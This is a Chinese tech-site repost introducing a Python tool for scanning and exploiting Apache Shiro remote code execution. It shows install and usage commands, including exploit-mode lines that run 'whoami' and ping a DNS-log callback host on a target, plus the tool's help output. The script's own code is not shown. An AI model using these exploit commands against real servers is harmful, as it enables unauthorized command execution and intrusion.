一个简单的Shiro RCE检测和利用脚本-电子发烧友网

一个简单的Shiro RCE检测和利用脚本

0x01 工具介绍

一个简单的Shiro RCE检测和利用脚本。

0x02 安装与使用

1、安装需要的包

pip install -r requirements.txt

2、检查该漏洞

python ShiroRceTool.py -m scan -u "http://example.com"

3、执行命令 (不回显)

python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"

4、执行命令（尝试回显）

python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e

5、获取帮助 - Get help

python ShiroRceTool.py
 ____  _     _           ____         _____           _
/ ___|| |__ (_)_ __ ___ |  _  ___ __|_   _|__   ___ | |
\___ | '_ | | '__/ _ | |_) / __/ _ | |/ _  / _ | |
 ___) | | | | | | | (_) |  _ < (_|  __/| | (_) | (_) | |
|____/|_| |_|_|_|  \___/|_| _\___\___||_|\___/ \___/|_|


                        By: Hack3rHan


usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e]


options:
  -h, --help            show this help message and exit
  -m MODE, --mode MODE  "exploit" or "scan".
  -u URL, --url URL     URL of the target.
  -c CMD, --cmd CMD     Command to execute.
  -e, --echo            Echo mode.

审核编辑：汤梓红

声明：本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人，不代表电子发烧友网立场。文章及其配图仅供工程师学习之用，如有内容侵权或者其他违规问题，请联系本站处理。举报投诉

检测

检测

+关注

关注
5

文章
4083

浏览量
90745
命令

命令

+关注

关注
5

文章
638

浏览量
21849
脚本

脚本

+关注

关注
1

文章
372

浏览量
14635

原文标题：一个简单的Shiro RCE检测和利用脚本。

文章出处：【微信号：菜鸟学安全，微信公众号：菜鸟学安全】欢迎添加关注！文章转载请注明出处。

工作中这种检测脚本太常见了

写一个检测脚本，用来检测本机所有磁盘分区读写是否都正常。

发表于 11-07 09:42 •250次阅读

Lua脚本简单介绍

Lua简单介绍Lua[1]是一个小巧的脚本语言。作者是巴西人。该语言的设计目的是为了嵌入应用程序中，从而为应用程序提供灵活的扩展和定制功能。Lua脚

发表于 08-20 06:37

Lua脚本简单介绍

Lua简单介绍Lua[1]是一个小巧的脚本语言。作者是巴西人。该语言的设计目的是为了嵌入应用程序中，从而为应用程序提供灵活的扩展和定制功能。Lua脚

发表于 08-20 08:06

如何利用AVR编写一个简单的串口通信的程序？

如何利用AVR编写一个简单的串口通信的程序？

发表于 11-02 08:06

如何利用stm32制作一个简单的USB转CAN？

如何利用stm32制作一个简单的USB转CAN？

发表于 02-22 08:08

基于DirectShow技术的RCE算法视频加密方案

本文设计了一种利用DirectShow 技术结合一种新的RCE 算法实现视频数据加密的方案。首先介绍了RCE 算法的加密解密过程和原理，然后研究了如何将RCE 算法应用到DirectS

发表于 06-26 08:52 •35次下载

大元RCE-2000A型电吹风电路图

大元RCE-2000A型电吹风电路图

发表于 02-18 10:51 •722次阅读

shiro简单教程，环境搭建，权限控制，登陆验证

shiro简单教程，环境搭建，权限控制，登陆验证

发表于 09-09 08:18 •9次下载

Apache Shiro框架的详细资料说明

自 2015 年 9 月 10 日以来，KyCore 项目中的用户机制已被完整地替换为了以 Apache Shiro 框架为基础建立的全新用户机制，原有的用户机制已基本上被全部删除。更新以来，同事

发表于 03-08 08:00 •4次下载

如何巧妙利用HFSS脚本录制功能

。摘要：在学个Antenna：HFSS脚本建模入门中，介绍了利用HFSS自带的Record Script To File功能进行脚本录制。但是大部分情况下，工程师们只是希望录制简单

发表于 07-29 11:15 •2762次阅读

shiro综合利用工具介绍

shiro综合利用工具：ShiroExp 工具介绍 shiro一把梭工具，该轮子主要有三大功能如下: 1、默认密钥爆破利用SimplePrincipalCollection进行

发表于 10-24 11:14 •4447次阅读

三极管用饱和Rce，而MOSFET用饱和Vds？

三极管ON状态时工作于饱和区，导通电流Ice主要由Ib与Vce决定，由于三极管的基极驱动电流Ib一般不能保持恒定，因而Ice就不能简单的仅由Vce来决定，即不能采用饱和Rce来表示（因Rce会变化）。由于饱和状态下Vce较小，

发表于 06-05 14:26 •473次阅读

Weblogic上的shiro漏洞利用工具介绍

日常项目中，可能会碰见部署在weblogic上的shiro，所以先写了这个生成攻击payload的小Demo，方便后面使用。但目前只支持无回显命令执行，后续回显、内存马功能后面出差后再写。

发表于 07-27 09:10 •818次阅读

shiro如何实现Web应用认证

前面简单介绍了shiro这个框架的一些基本知识，包括其架构模型，主要的功能，关键名称的含义，以及核心模块和对应的接口定义。开始的话今天我们从一个简单示例，先了解使用shiro实现W

发表于 10-08 14:53 •271次阅读

Shiro功能介绍

部分配置进行修改即可使用。对于其原理也只是知道个大概，具体实现细节可以说是一无所知。 Shiro作为安全框架，相比其他同类型框架，在整体结构上更显得简单且更易于理解，通过对Shrio的学习，在理解里其实现原理后，对后面学习其他同类型的框架也

发表于 10-08 15:07 •261次阅读